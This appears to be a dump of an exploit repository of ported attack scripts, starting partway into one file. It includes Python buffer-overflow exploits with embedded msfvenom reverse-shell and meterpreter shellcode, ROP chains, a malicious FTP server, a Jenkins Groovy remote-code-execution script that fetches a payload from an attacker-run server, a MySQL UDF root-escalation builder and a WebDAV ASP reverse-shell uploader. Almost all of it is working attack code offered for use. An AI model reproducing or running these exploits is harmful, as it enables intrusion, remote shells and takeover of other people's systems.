158 | "\x35\x32\x31\x2a\x2d\x74\x74\x74\x5a\x2d\x36\x5a\x74\x30\x2d" 159 | "\x25\x32\x6a\x38\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a" 160 | "\x2d\x75\x75\x43\x75\x2d\x43\x6f\x41\x30\x2d\x39\x64\x30\x34" 161 | "\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x74\x2d\x58" 162 | "\x6e\x2d\x78\x47\x35\x69\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32" 163 | "\x31\x2a\x2d\x66\x79\x4f\x66\x2d\x48\x7a\x25\x47\x50\x25\x4a" 164 | "\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x42\x42\x7a\x42\x2d\x33" 165 | "\x6d\x55\x32\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d" 166 | "\x61\x61\x61\x41\x2d\x61\x39\x64\x25\x2d\x59\x33\x7a\x34\x50" 167 | "\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x66\x66\x66\x66" 168 | "\x2d\x41\x41\x66\x66\x2d\x25\x33\x66\x66\x2d\x34\x25\x6d\x43" 169 | "\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x49\x49\x32" 170 | "\x49\x2d\x49\x59\x25\x49\x2d\x72\x74\x25\x6d\x50" 171 | ) 172 | shellcode += "A" * 4000 173 | 174 | egghunter = "A" * 40 # serve as NOP's 175 | egghunter += ( 176 | "\x25\x4a\x4d\x4e\x55" # and eax, 0x554e4d4a 177 | "\x25\x35\x32\x31\x2a" # and eax, 0x2a313235 178 | "\x2d\x58\x58\x58\x58" # sub eax, 0x58585858 179 | "\x2d\x58\x58\x67\x58" # sub eax, 0x58675858 180 | "\x2d\x5a\x4f\x2d\x4f" # sub eax, 0x4f2d4f5a 181 | "\x50" # push eax 182 | "\x5c" # pop esp 183 | ) 184 | egghunter += ( 185 | "%JMNU%521*-%OOO-%OOO-AzayP%JMNU%521*-r-Pr-" 186 | "r%Pr-m7ukP%JMNU%521*-wwww-wwwA-wwA--k%FBP%" 187 | "JMNU%521*-Jk1J-Tk1T-sp%1P%JMNU%521*-WWM6-6" 188 | "W30-7L%%P%JMNU%521*-WNWW-W%d%-P4wTP%JMNU%5" 189 | "21*-wt7G-zIvNP%JMNU%521*-1%uu-1%u1-84KYP" 190 | ) 191 | 192 | offset = "A" * (23920-len(shellcode)) # offset to nSEH 193 | nSEH = "\x74\x26\x75\x26" # JE/JNZ + 38 (decimal) 194 | SEH = struct.pack(' " % sys.argv[0] 30 | print "Example: %s 10.11.1.202 8080" % sys.argv[0] 31 | sys.exit() 32 | 33 | # msfvenom -p windows/shell/reverse_tcp LHOST=X LPORT=2 EXITFUNC=thread -b "\x00" -f python 34 | buf = "" 35 | buf += "\xbd\xfb\xa2\x4f\x90\xdd\xc6\xd9\x74\x24\xf4\x5a\x29" 36 | buf += "\xc9\xb1\x59\x83\xc2\x04\x31\x6a\x10\x03\x6a\x10\x19" 37 | buf += "\x57\xb3\x78\x5f\x98\x4c\x79\x3f\x10\xa9\x48\x7f\x46" 38 | buf += "\xb9\xfb\x4f\x0c\xef\xf7\x24\x40\x04\x83\x48\x4d\x2b" 39 | buf += "\x24\xe6\xab\x02\xb5\x5a\x8f\x05\x35\xa0\xdc\xe5\x04" 40 | buf += "\x6b\x11\xe7\x41\x91\xd8\xb5\x1a\xde\x4f\x2a\x2e\xaa" 41 | buf += "\x53\xc1\x7c\x3b\xd4\x36\x34\x3a\xf5\xe8\x4e\x65\xd5" 42 | buf += "\x0b\x82\x1e\x5c\x14\xc7\x1a\x16\xaf\x33\xd1\xa9\x79" 43 | buf += "\x0a\x1a\x05\x44\xa2\xe9\x57\x80\x05\x11\x22\xf8\x75" 44 | buf += "\xac\x35\x3f\x07\x6a\xb3\xa4\xaf\xf9\x63\x01\x51\x2e" 45 | buf += "\xf5\xc2\x5d\x9b\x71\x8c\x41\x1a\x55\xa6\x7e\x97\x58" 46 | buf += "\x69\xf7\xe3\x7e\xad\x53\xb0\x1f\xf4\x39\x17\x1f\xe6" 47 | buf += "\xe1\xc8\x85\x6c\x0f\x1d\xb4\x2e\x58\xd2\xf5\xd0\x98" 48 | buf += "\x7c\x8d\xa3\xaa\x23\x25\x2c\x87\xac\xe3\xab\xe8\x87" 49 | buf += "\x54\x23\x17\x27\xa5\x6d\xdc\x73\xf5\x05\xf5\xfb\x9e" 50 | buf += "\xd5\xfa\x2e\x0a\xd3\x6c\xda\xc0\xdb\xbf\xb2\xd4\xdb" 51 | buf += "\x3f\x40\x50\x3d\x6f\x14\x32\x92\xd0\xc4\xf2\x42\xb9" 52 | buf += "\x0e\xfd\xbd\xd9\x31\xd7\xd5\x70\xdd\x8e\x8e\xec\x44" 53 | buf += "\x8b\x45\x8c\x89\x01\x20\x8e\x01\xa0\xd4\x41\xe1\xc1" 54 | buf += "\xc6\xb6\x90\x29\x17\x47\x38\x2a\x7d\x43\xea\x7d\xe9" 55 | buf += "\x49\xcb\x4a\xb6\xb2\x3e\xc9\xb1\x4d\xbe\xf8\xca\x78" 56 | buf += "\x54\x45\xa5\x84\xb8\x45\x35\xd3\xd2\x45\x5d\x83\x86" 57 | buf += "\x15\x78\xcc\x13\x0a\xd1\x59\x9b\x7b\x85\xca\xf3\x81" 58 | buf += "\xf0\x3d\x5c\x79\xd7\x3d\x9a\x85\xa5\x63\x02\xee\x55" 59 | buf += "\x24\xb2\xee\x3f\xa4\xe2\x86\xb4\x8b\x0d\x67\x34\x06" 60 | buf += "\x46\xef\xbf\xc7\x25\x8e\xc0\xcd\xeb\x0e\xc0\xe2\x37" 61 | buf += "\x46\x4f\x04\xc8\x67\xb1\x39\x1f\x5e\xc7\x7a\x9c\xe5" 62 | buf += "\xc8\x98\x08\x10\x61\x05\xd9\x99\xec\xb6\x34\xdd\x08" 63 | buf += "\x35\xbc\x9e\xee\x25\xb5\x9b\xab\xe1\x26\xd6\xa4\x87" 64 | buf += "\x48\x45\xc4\x8d" 65 | 66 | # Our raw exploit before being encoded to base64 67 | print "[+] Generating That Pwn Sauce" 68 | raw_exploit = "bruh" + ":" 69 | raw_exploit += ''.join(random.sample(string.lowercase*17,len(string.lowercase*17))) 70 | raw_exploit += "\xeb\x64" + "\x90\x90" + ret 71 | raw_exploit += "\x90"*266 + "\xeb\x10" + "\x90"*109 + buf 72 | # Base64 encoded exploit 73 | print "[+] Adding Base64 Encoding On Top" 74 | exploit = base64.b64encode(raw_exploit) + "=" 75 | # Sending our exploit 76 | print "[+] Setting Up Malicous GET Request" 77 | get_request = "" 78 | get_request += "GET / HTTP/1.1\r\n" 79 | get_request += "Host:%s:%d\r\n" % (target, port) 80 | get_request += "Authorization: Basic %s\r\n\r\n" % (exploit) 81 | # Send Our Exploit 82 | print "[+] Better Have That Listener Setup!" 83 | print "[+] Sending %s:%d The Secret Sauce" % (target, port) 84 | tcp_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 85 | tcp_sock.connect((target, port)) 86 | tcp_sock.send(get_request) 87 | response = tcp_sock.recv(4096) 88 | 89 | -------------------------------------------------------------------------------- /Ported-Exploits/CVE-2006-6184.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # 3 | # Script name : allied-tftp-server-sploit.py 4 | # Req Modules : netifaces 5 | # Author : wetw0rk 6 | # Discovered by : liuqx@nipc.org.cn 7 | # Version : 1.0 8 | # Python Vers. : 2.7 9 | # Description : This exploit allows for remote code execution on 10 | # the Allied Telesyn AT-TFTP Server/Daemon 1.9 11 | # 12 | 13 | import sys, socket, struct 14 | import netifaces as ni 15 | 16 | # Return Address's 17 | return_addess = {'0': 0x702ea6f7, # Windows NT_SP4 English 18 | '1': 0x750362c3, # Windows 2000 SP0 English 19 | '2': 0x75031d85, # Windows 2000 SP1 English 20 | '3': 0x7503431b, # Windows 2000 SP2 English 21 | '4': 0x74fe1c5a, # Windows 2000 SP3 English 22 | '5': 0x75031dce, # Windows 2000 SP4 English 23 | '6': 0x71ab7bfb, # Windows XP SP0/1 English 24 | '7': 0x71ab9372, # Windows XP SP2 English 25 | '8': 0x7e429353, # Windows XP SP3 English 26 | '9': 0x7c86fed3, # Windows Server 2003 27 | '10': 0x7c86a01b} # Windows Server 2003 SP2 28 | 29 | print "--------------------------------------------------------------" 30 | print "- Allied Telesyn AT-TFTP Server/Daemon 1.9 Remote Exploit" 31 | print "- Exploit discovered by liuqx@nipc.org.cn, ported by wetw0rk" 32 | 33 | try: 34 | 35 | target = sys.argv[1] 36 | port = int(sys.argv[2]) 37 | ret = return_addess[str(sys.argv[3])] 38 | interface = sys.argv[4] 39 | 40 | except IndexError: 41 | 42 | print "- Usage: %s " % sys.argv[0] 43 | print "- Example: %s 10.11.1.226 69 4 tap0" % sys.argv[0] 44 | print "- Targets:" 45 | print '-\t0\tWindows NT_SP4 English' 46 | print '-\t1\tWindows 2000 SP0 English' 47 | print '-\t2\tWindows 2000 SP1 English' 48 | print '-\t3\tWindows 2000 SP2 English' 49 | print '-\t4\tWindows 2000 SP3 English' 50 | print '-\t5\tWindows 2000 SP4 English' 51 | print '-\t6\tWindows XP SP0/1 English' 52 | print '-\t7\tWindows XP SP2 English' 53 | print '-\t8\tWindows XP SP3 English' 54 | print '-\t9\tWindows Server 2003' 55 | print '-\t10\tWindows Server 2003 SP2' 56 | sys.exit() 57 | 58 | # msfvenom -p windows/meterpreter/reverse_nonx_tcp LHOST=X LPORT=X -f raw -o msfvenom_payload 59 | # echo -en "\x81\xec\xac\x0d\x00\x00" > stack_adjustment 60 | # cat stack_adjustment msfvenom_payload > adjusted_shellcode 61 | # cat adjusted_shellcode | msfvenom -p - -b "\x00" -a x86 EXITFUNC=thread --platform Windows -f python 62 | buf = "" 63 | buf += "\xba\x3b\x46\xce\x07\xdb\xcc\xd9\x74\x24\xf4\x5b\x31" 64 | buf += "\xc9\xb1\x2e\x83\xeb\xfc\x31\x53\x11\x03\x53\x11\xe2" 65 | buf += "\xce\xc7\x22\xab\x3d\xc8\xba\x48\x57\x23\xfd\x58\x5e" 66 | buf += "\x4c\xfd\x66\xc0\x82\xd9\x12\x7d\xd9\x56\x58\x40\x59" 67 | buf += "\x68\x4e\x31\xce\x4a\x91\xaf\x7a\xbe\x0b\x2e\x93\x8e" 68 | buf += "\xeb\xa9\xc7\x30\x21\xc4\x16\x71\x32\x16\x6d\x83\x78" 69 | buf += "\xf0\xb7\xa1\x0a\x1f\x8c\xbe\xba\xfb\x12\x28\x22\x88" 70 | buf += "\x09\xf3\x20\xc1\x2d\x02\xde\xde\x61\x9d\xa9\x8c\x5d" 71 | buf += "\x81\xc8\xb3\x7e\x88\xd1\x2f\xf4\xa8\xd5\x24\x4a\x23" 72 | buf += "\x9d\x4a\x57\x96\x2a\xc2\x6f\xb6\x4a\x41\x16\x2e\xa0" 73 | buf += "\x57\xbe\xd9\xb5\xa5\x61\x72\x5c\x70\xef\x1a\x5f\x54" 74 | buf += "\x85\x88\xcc\x0b\xf5\x6d\xa0\xe8\xaa\xf8\xa1\x88\xcd" 75 | buf += "\x14\x25\x56\x99\xb9\x50\xef\xc2\xe1\x62\xd9\x6b\xa7" 76 | buf += "\x35\x8a\x8c\x01\xd2\x3c\xb3\x06\xdd\xb7\x55\x3f\xde" 77 | buf += "\xc5\xff\xec\x57\x2a\x95\x02\x3b\xfb\x0c\x9a\xec\x06" 78 | buf += "\x2e\x0a\x42\xbc\xdc\xe3\x30\xeb\x8f\x65\x0e\xd3\x08" 79 | buf += "\x95\x96" 80 | 81 | # Get Users IP From Interface 82 | ni.ifaddresses(interface) 83 | ip = ni.ifaddresses(interface)[2][0]['addr'] 84 | lhost = ip 85 | print "- Sending Exploit To %s:%s" % (target, port) 86 | # UDP Socket via IPV4 87 | udp_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) 88 | # Exploit 89 | exploit = "\x00\x02" + "\x90" * (25 - len(lhost)) 90 | exploit += buf 91 | exploit += struct.pack(' [check] anonymous -> connect 17 | # 18 | 19 | import struct, socket 20 | 21 | host = "0.0.0.0" 22 | port = 21 23 | 24 | # msfvenom LHOST=192.168.0.12 LPORT=34 -p windows/meterpreter/reverse_tcp 25 | # -f python -b "\x00\x0a\x10" -v shellcode --smallest 26 | shellcode = "" 27 | shellcode += "\x2b\xc9\x66\xb9\x18\x01\xe8\xff\xff\xff\xff\xc1" 28 | shellcode += "\x5e\x30\x4c\x0e\x07\xe2\xfa\xfd\xea\x81\x04\x05" 29 | shellcode += "\x06\x67\x81\xec\x3b\xcb\x68\x86\x5e\x3f\x9b\x43" 30 | shellcode += "\x1e\x98\x46\x01\x9d\x65\x30\x16\xad\x51\x3a\x2c" 31 | shellcode += "\xe1\xb3\x1c\x40\x5e\x21\x08\x05\xe7\xe8\x25\x28" 32 | shellcode += "\xed\xc9\xde\x7f\x79\xa4\x62\x21\xb9\x79\x08\xbe" 33 | shellcode += "\x7a\x26\x40\xda\x72\x3a\xed\x6c\xb5\x66\x60\x40" 34 | shellcode += "\x91\xc8\x0d\x5d\xa5\x7d\x01\xc2\x7e\xc0\x4d\x9b" 35 | shellcode += "\x7f\xb0\xfc\x90\x9d\x5e\x55\x92\x6e\xb7\x2d\xaf" 36 | shellcode += "\x59\x26\xa4\x66\x23\x7b\x15\x85\x3a\xe8\x3c\x41" 37 | shellcode += "\x67\xb4\x0e\xe2\x66\x20\xe7\x35\x72\x6e\xa3\xfa" 38 | shellcode += "\x76\xf8\x75\xa5\xff\x33\x5c\x5d\x21\x20\x1d\x24" 39 | shellcode += "\x24\x2e\x7f\x61\xdd\xdc\xde\x0e\x94\x6c\x05\xd4" 40 | shellcode += "\xe2\xb8\xbe\x8d\x8e\xe7\xe7\xe2\xa0\xcc\xc0\xfd" 41 | shellcode += "\xda\xe0\xbe\x9e\x65\x4e\x24\x0d\x9f\x9f\xa0\x88" 42 | shellcode += "\x66\xf7\xf4\xcd\x8f\x27\xc3\xa9\x55\x7e\xc6\xa7" 43 | shellcode += "\xc6\x6f\x18\xb1\xbe\xdb\xb6\xb5\xb6\x95\x31\x5f" 44 | shellcode += "\xea\xeb\xec\xed\xfe\xef\x80\x91\xaa\x29\xcb\x1a" 45 | shellcode += "\x26\x38\x1d\x5e\xa0\xdb\x9a\x9a\xa6\x56\x75\xa5" 46 | shellcode += "\xb3\x2c\x01\x50\x16\xa3\xd4\x26\x94\xd3\xa9\x31" 47 | shellcode += "\xb6\x2f\x55\x43\xb4\x1c\x31\x8f\xe6\x8d\xec\xbf" 48 | shellcode += "\xbd\x83\xee\x34\x26\xb0\x0f\x24\x79\xc5\x9e\xb5" 49 | shellcode += "\x9e\xf7\xe8\xf9\xfa\xad\x96\xfd\x96\xa7\xa4\x52" 50 | shellcode += "\xe7\xfc\xd1\x96\x55\x6d\x08\x5f\x59\x5c\x64\x0f" 51 | shellcode += "\xd7\xc7\x4f\xee\xc7\x12\xd7\x3c\xd0\x62\xf6\xda" 52 | 53 | def create_rop_chain(): 54 | # https://www.corelan.be/index.php/security/corelan-ropdb/ 55 | # rop chain generated with mona.py - www.corelan.be 56 | rop_gadgets = [ 57 | 0x7c37653d, # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN 58 | 0xfffffdff, # Value to negate, will become 0x00000201 (dwSize) 59 | 0x7c347f98, # RETN (ROP NOP) [msvcr71.dll] 60 | 0x7c3415a2, # JMP [EAX] [msvcr71.dll] 61 | 0xffffffff, # 62 | 0x7c376402, # skip 4 bytes [msvcr71.dll] 63 | 0x7c351e05, # NEG EAX # RETN [msvcr71.dll] 64 | 0x7c345255, # INC EBX # FPATAN # RETN [msvcr71.dll] 65 | 0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN [msvcr71.dll] 66 | 0x7c344f87, # POP EDX # RETN [msvcr71.dll] 67 | 0xffffffc0, # Value to negate, will become 0x00000040 68 | 0x7c351eb1, # NEG EDX # RETN [msvcr71.dll] 69 | 0x7c34d201, # POP ECX # RETN [msvcr71.dll] 70 | 0x7c38b001, # &Writable location [msvcr71.dll] 71 | 0x7c347f97, # POP EAX # RETN [msvcr71.dll] 72 | 0x7c37a151, # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll] 73 | 0x7c378c81, # PUSHAD # ADD AL,0EF # RETN [msvcr71.dll] 74 | 0x7c345c30, # ptr to 'push esp # ret ' [msvcr71.dll] 75 | ] 76 | return ''.join(struct.pack(' META-INF/services/org.codehaus.groovy.plugins.Runners" % self.pname) 84 | os.system("javac -Xlint:-options -source 6 -target 1.6 %s.java" % self.pname) 85 | os.system("jar cf %s-1.jar ." % self.pname) 86 | 87 | print "{2} starting evil payload server" 88 | os.chdir("%s/www" % home) 89 | jobs = [] 90 | for i in range(1): 91 | p = multiprocessing.Process(target=self.evil_server) 92 | jobs.append(p) 93 | p.start() 94 | 95 | os.chdir(home) 96 | 97 | return 98 | 99 | def exploit(self): 100 | self.gen_payload() 101 | 102 | cookies = \ 103 | { 104 | 'JSESSIONID.wetw0rk!': 'XXXXXXXXXXXXXXXXXXXXXXXX', 105 | } 106 | 107 | headers = \ 108 | { 109 | 'Host': '{:s}:{:s}'.format(self.rhost, self.rport), 110 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 111 | 'Accept-Language': 'en-US,en;q=0.5', 112 | 'Accept-Encoding': 'gzip, deflate', 113 | 'Connection': 'close', 114 | 'Upgrade-Insecure-Requests': '1', 115 | } 116 | 117 | print "{3} as easy as 1,2,3 triggering now" 118 | response = requests.get( 119 | ( 120 | 'http://{:s}:{:s}/securityRealm/user/admin/descriptorByName/' 121 | 'org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=' 122 | '@GrabConfig(disableChecksums=true)%0a' 123 | '@GrabResolver(name=%27{:s}%27,%20root=%27http://{:s}%27)%0a' 124 | '@Grab(group=%27package%27,%20module=%27{:s}%27,%20version=%271%27)%0aimport%20Payload;'.format( 125 | self.rhost, self.rport, 126 | self.pname, 127 | self.lhost, 128 | self.pname 129 | ) 130 | ), 131 | headers=headers, 132 | cookies=cookies, 133 | verify=False 134 | ) 135 | 136 | return 137 | 138 | def main(): 139 | try: 140 | rhost = sys.argv[1] 141 | rport = sys.argv[2] 142 | lhost = sys.argv[3] 143 | lport = sys.argv[4] 144 | except: 145 | print "Usage: ./%s " % sys.argv[0] 146 | print "MAKE SURE U GOT A LISTENER HOMIE!!" 147 | exit(-1) 148 | 149 | start = exploit_ya_bish(rhost,rport,lhost,lport) 150 | start.exploit() 151 | os.system("rm -r www") 152 | 153 | main() 154 | -------------------------------------------------------------------------------- /Ported-Exploits/allok-exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # 3 | # Exploit Title : Allok AVI DivX MPEG to DVD Converter - Buffer Overflow (SEH) 4 | # Date : 3/27/18 5 | # Exploit Author : wetw0rk 6 | # Vulnerable Software : Allok AVI DivX MPEG to DVD Converter 7 | # Vendor Homepage : http://alloksoft.com/ 8 | # Version : 2.6.1217 9 | # Software Link : http://alloksoft.com/allok_avimpeg2dvd.exe 10 | # Tested On : Windows 10 , Windows 7 (x86-64) 11 | # 12 | # Greetz : Paul, Sally, Nekotaijutsu, mvrk, abatchy17 13 | # 14 | # Trigger the vulnerability by: 15 | # Copy text file contents -> paste into "License Name" -> calc 16 | # 17 | 18 | shellcode = "\x90" * 20 # nop sled 19 | shellcode += ( # msfvenom -a x86 --platform windows -p windows/exec CMD=calc.exe -b "\x00\x09\x0a\x0d" -f c 20 | "\xd9\xe9\xd9\x74\x24\xf4\xbe\x4b\x88\x2c\x8f\x58\x31\xc9\xb1" 21 | "\x31\x83\xe8\xfc\x31\x70\x14\x03\x70\x5f\x6a\xd9\x73\xb7\xe8" 22 | "\x22\x8c\x47\x8d\xab\x69\x76\x8d\xc8\xfa\x28\x3d\x9a\xaf\xc4" 23 | "\xb6\xce\x5b\x5f\xba\xc6\x6c\xe8\x71\x31\x42\xe9\x2a\x01\xc5" 24 | "\x69\x31\x56\x25\x50\xfa\xab\x24\x95\xe7\x46\x74\x4e\x63\xf4" 25 | "\x69\xfb\x39\xc5\x02\xb7\xac\x4d\xf6\x0f\xce\x7c\xa9\x04\x89" 26 | "\x5e\x4b\xc9\xa1\xd6\x53\x0e\x8f\xa1\xe8\xe4\x7b\x30\x39\x35" 27 | "\x83\x9f\x04\xfa\x76\xe1\x41\x3c\x69\x94\xbb\x3f\x14\xaf\x7f" 28 | "\x42\xc2\x3a\x64\xe4\x81\x9d\x40\x15\x45\x7b\x02\x19\x22\x0f" 29 | "\x4c\x3d\xb5\xdc\xe6\x39\x3e\xe3\x28\xc8\x04\xc0\xec\x91\xdf" 30 | "\x69\xb4\x7f\xb1\x96\xa6\x20\x6e\x33\xac\xcc\x7b\x4e\xef\x9a" 31 | "\x7a\xdc\x95\xe8\x7d\xde\x95\x5c\x16\xef\x1e\x33\x61\xf0\xf4" 32 | "\x70\x9d\xba\x55\xd0\x36\x63\x0c\x61\x5b\x94\xfa\xa5\x62\x17" 33 | "\x0f\x55\x91\x07\x7a\x50\xdd\x8f\x96\x28\x4e\x7a\x99\x9f\x6f" 34 | "\xaf\xfa\x7e\xfc\x33\xd3\xe5\x84\xd6\x2b" 35 | ) 36 | 37 | offset = "A" * 780 38 | nSEH = "\x90\x90\xeb\x06" # jmp +0x06 39 | SEH = "\x30\x45\x01\x10" # pop edi, pop esi, ret [SkinMagic.dll] 40 | trigger = "D" * (50000 - len(# trigger the vuln (plenty of space!!!) 41 | offset + 42 | nSEH + 43 | SEH + 44 | shellcode 45 | ) 46 | ) 47 | 48 | payload = offset + nSEH + SEH + shellcode + trigger 49 | fd = open("pasteME.txt", "w") 50 | fd.write(payload) 51 | fd.close() 52 | -------------------------------------------------------------------------------- /Ported-Exploits/mysql_UDF_pwnage.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # 3 | # Script name : mysql_pwnage.py 4 | # Req Modules : None standard 5 | # Author : Marco Ivaldi 6 | # Ported By : wetw0rk 7 | # Original Exploit : https://www.exploit-db.com/exploits/1518/ 8 | # Version : 2.0 9 | # Python Version : 2.7 10 | # Description : This exploit targets MySQL from 4.1.10a and 4.0.24 via 11 | # User-Defined-Function (UDF) 12 | # 13 | 14 | import os, sys, subprocess 15 | 16 | # Get current username 17 | username = os.getlogin() 18 | 19 | print "[*] Currently Logged in as %s" % (username) 20 | # This is where we want to create this script 21 | assumed_cwd = "/home/%s" % username 22 | 23 | try: 24 | if os.getcwd() != assumed_cwd: 25 | print "[-] Not in home folder attemting to change" 26 | os.chdir(assumed_cwd) 27 | 28 | except: 29 | 30 | print "[-] Changing directory failed" 31 | 32 | # This is the C code from Marco Ivaldi 33 | def raptor(username): 34 | 35 | print "[*] Generating Sploit By Marco Ivaldi" 36 | udf_exploit = "#include \n" 37 | udf_exploit += "#include \n" 38 | udf_exploit += "enum Item_result {STRING_RESULT, REAL_RESULT, INT_RESULT, ROW_RESULT};\n" 39 | udf_exploit += "typedef struct st_udf_args {\n" 40 | udf_exploit += " unsigned int arg_count;\n" # number of arguments 41 | udf_exploit += " enum Item_result *arg_type;\n" # pointer to item_result 42 | udf_exploit += " char **args;\n" # pointer to arguments 43 | udf_exploit += " unsigned long *lengths;\n" # length of string args 44 | udf_exploit += " char *maybe_null;\n" # 1 for maybe_null args 45 | udf_exploit += "} UDF_ARGS;\n" 46 | udf_exploit += "typedef struct st_udf_init {\n" 47 | udf_exploit += " char maybe_null;\n" # 1 if func can return NULL 48 | udf_exploit += " unsigned int decimals;\n" # for real functions 49 | udf_exploit += " unsigned long max_length;\n" # for string functions 50 | udf_exploit += " char *ptr;\n" # free ptr for func data 51 | udf_exploit += " char const_item;\n" # 0 if result is constant 52 | udf_exploit += "} UDF_INIT;\n" 53 | udf_exploit += "int do_system(UDF_INIT *initid, UDF_ARGS *args, char *is_null, char *error)\n" 54 | udf_exploit += "{\n" 55 | udf_exploit += " if (args->arg_count != 1)\n" 56 | udf_exploit += " return(0);\n" 57 | udf_exploit += " system(args->args[0]);\n" 58 | udf_exploit += " return(0);\n" 59 | udf_exploit += "}\n" 60 | udf_exploit += "char do_system_init(UDF_INIT *initid, UDF_ARGS *args, char *message)\n" 61 | udf_exploit += "{\n" 62 | udf_exploit += " return(0);\n" 63 | udf_exploit += "}\n" 64 | # Write the exploit to a file 65 | e_file_name = "%s_udf.c" % (username) 66 | print "[+] Writing Sploit to %s" % e_file_name 67 | exploit_file = open(e_file_name, 'w') 68 | exploit_file.write(udf_exploit) 69 | exploit_file.close() 70 | 71 | def setuid(): 72 | 73 | print "[*] Generating setuid C script" 74 | uid_code = "#include\n" 75 | uid_code += "#include\n" 76 | uid_code += "#include \n" 77 | uid_code += "int main()\n" 78 | uid_code += "{\n" 79 | uid_code += """ setuid(0); setgid(0); system("/bin/bash");\n""" 80 | uid_code += "}\n" 81 | # Write the to file 82 | print "[+] Writing Code to setuid.c" 83 | setuid_file = open('setuid.c', 'w') 84 | setuid_file.write(uid_code) 85 | setuid_file.close() 86 | 87 | def compile(username): 88 | 89 | print "[*] Starting To Compile Exploit" 90 | command_one = "gcc -g -c %s_udf.c" % (username) 91 | command_two = "gcc -g -shared -W1,-soname,%s_udf.so -o %s_udf.so %s_udf.o -lc" % (username,username,username) 92 | command_three = "cp setuid.c /tmp/" 93 | command_four = "gcc setuid.c -o /tmp/setuid" 94 | os.system(command_one) 95 | os.system(command_two) 96 | os.system(command_three) 97 | os.system(command_four) 98 | print "[+] Exploit Compiled Please Run The Following" 99 | print "mysql -u root -p" 100 | print "use mysql;" 101 | print "create table foo(line blob);" 102 | print "insert into foo values(load_file('/home/%s/%s_udf.so'));" % (username,username) 103 | print "select * from foo into dumpfile '/usr/lib/%s_udf.so';" % (username) 104 | print "create function do_system returns integer soname '%s_udf.so';" % (username) 105 | print "select * from mysql.func;" 106 | print "select do_system('id > /tmp/out; chown %s.%s /tmp/out');" % (username,username) 107 | print "select do_system('gcc -o /tmp/setuid /home/%s/setuid.c');" % (username) 108 | print "select do_system('chmod u+s /tmp/setuid');" 109 | print "\! sh" 110 | print "/tmp/setuid" 111 | 112 | raptor(username) 113 | setuid() 114 | compile(username) 115 | -------------------------------------------------------------------------------- /Ported-Exploits/webdav_exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # 3 | # Script name : webdav_exploit.py 4 | # Req Modules : easywebdav, webdavclient 5 | # Note : Using Kali GNU/Linux Rolling for msfvenom 6 | # Author : wetw0rk 7 | # Version : 2.0 8 | # Python Version : 2.7 9 | # Description : Execute and upload a ASP payload on a IIS server that has 10 | # world-writeable directories via a WebDav PUT request. 11 | # 12 | 13 | import os, sys, urllib2, subprocess, time 14 | 15 | # Check for uncommon modules 16 | try: 17 | import easywebdav 18 | except: 19 | print "[-] easywebdav not installed" 20 | ans = raw_input("[Y/N] Install > ") 21 | if ans == 'Y': 22 | os.system("pip install easywebdav") 23 | else: 24 | print "[X] Exiting" 25 | sys.exit() 26 | try: 27 | import webdav.client as wc 28 | except: 29 | print "[-] webdavclient not installed" 30 | ans = raw_input("[Y/N] Install > ") 31 | if ans == 'Y': 32 | os.system("sudo apt-get install libxml2-dev libxslt-dev python-dev") 33 | os.system("sudo apt-get install libcurl4-openssl-dev python-pycurl") 34 | os.system("sudo pip install webdavclient") 35 | else: 36 | print "[X] Exiting" 37 | sys.exit() 38 | try: 39 | 40 | LHOST = "LHOST=" + str(sys.argv[1]) 41 | LPORT = "LPORT=" + str(sys.argv[2]) 42 | PAYLOAD = "windows/shell_reverse_tcp" 43 | TARGET = str(sys.argv[3]) 44 | 45 | except IndexError: 46 | 47 | print "Usage: %s " % sys.argv[0] 48 | print "Example: %s 10.11.0.211 42 10.11.1.14" % sys.argv[0] 49 | sys.exit() 50 | 51 | def malicous_asp(LHOST, LPORT, PAYLOAD): 52 | 53 | # msfvenom command to create asp payload 54 | print "[*] Generating ASP payload" 55 | print "[!] Have a listener ready" 56 | try: 57 | create_payload = subprocess.Popen( 58 | ['msfvenom', '-p', PAYLOAD, LHOST, LPORT, 59 | '-f', 'asp'], stdout=subprocess.PIPE).communicate()[0] 60 | except: 61 | print "[!] MSFVENOM NOT INSTALLED" 62 | sys.exit() 63 | # writing payload to a file 64 | print "[*] Payload generated writing to file" 65 | payload_file = open('not_a_shell.asp', 'w') 66 | payload_file.write(create_payload) 67 | payload_file.close() 68 | 69 | def upload_asp(TARGET): 70 | 71 | # create a webdav object 72 | print "[*] Connecting to %s" % TARGET 73 | webdav = easywebdav.connect(TARGET) 74 | # upload the file 75 | print "[*] Uploading payload to %s" % TARGET 76 | try: 77 | webdav.upload("not_a_shell.asp", "not_a_shell.asp;.txt") 78 | # use different client to move file 79 | options = {'webdav_hostname': TARGET} 80 | client = wc.Client(options) 81 | client.move(remote_path_from="not_a_shell.asp;.txt", remote_path_to="not_a_shell.asp") 82 | except: 83 | # if move fails try copy 84 | print "[*] Encountered an error" 85 | print "[*] Adjusting payload" 86 | webdav = easywebdav.connect(TARGET) 87 | webdav.upload("not_a_shell.asp", "not_a_shell.txt") 88 | options = {'webdav_hostname': TARGET} 89 | client = wc.Client(options) 90 | client.copy(remote_path_from="not_a_shell.txt", remote_path_to="not_a_shell.asp;.txt") 91 | 92 | def execute_asp(TARGET): 93 | 94 | # request url then open it 95 | print "[!] You Have 2 Seconds For That Handler" 96 | time.sleep(2) 97 | print "[+] Executing Payload 4 Da Shellz" 98 | url = "http://" + TARGET + "/not_a_shell.asp" 99 | r = urllib2.Request(url) 100 | response = urllib2.urlopen(r) 